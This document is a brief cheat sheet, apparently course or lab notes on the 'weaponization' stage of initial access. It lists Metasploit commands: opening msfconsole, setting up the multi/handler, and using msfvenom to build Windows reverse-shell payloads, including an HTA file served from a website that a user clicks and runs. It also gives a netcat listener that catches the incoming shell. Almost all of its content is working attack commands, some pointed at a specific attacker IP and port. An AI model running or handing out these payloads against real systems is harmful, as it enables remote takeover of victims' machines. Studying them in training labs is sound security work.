Initial Access - security

Weaponization

UsageContextDescription
msfconsoleconsoleOpen up the base console
use exploit/multi/handlermsfconsoleThis command sets the active module to the multi/handler exploit module.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_host LPORT=attacker_port -f file_type -o output_fileconsole or msfconsoleBuilds a reverse TCP exploit that, if run by the user (and properly listening on attackbox), opens up a reverse shell for the attacker
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.htaconsole or msfconsoleBuilds a reverse TCP exploit that, if run by the user (and properly listening on attackbox), opens up a reverse shell for the attacker. The example served this from a website and the user clicked on it and ran it.
sudo nc -lvp 443consoleOpens up a port where we are listening for our reverse shell. The victim runs the file created with msf and it connects back to us